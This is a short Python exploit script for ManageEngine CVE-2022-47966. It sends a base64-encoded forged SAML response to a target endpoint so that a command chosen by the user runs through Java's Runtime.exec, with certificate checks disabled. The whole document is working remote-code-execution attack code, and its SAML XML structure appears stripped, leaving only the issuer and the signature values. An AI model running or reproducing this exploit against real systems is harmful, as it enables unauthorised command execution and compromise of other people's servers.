#!/usr/bin/python3 import urllib3 import base64 import requests import argparse urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) parser = argparse.ArgumentParser(description='ManageEngine CVE-2022-47966') parser.add_argument('--url', type=str, required=True, help='Target SAML endpoint') parser.add_argument('--command', type=str, required=True, help="Argument to Java's Runtime.exec method") parser.add_argument('--issuer', type=str, required=False, default="issuer", help="Issuer for SAML assertion") args = parser.parse_args() url = args.url command = args.command issuer = args.issuer saml = f""" {issuer}

H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000= RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw== """ d = {'SAMLResponse': base64.b64encode(saml.encode())} requests.post(url, data=d, verify=False)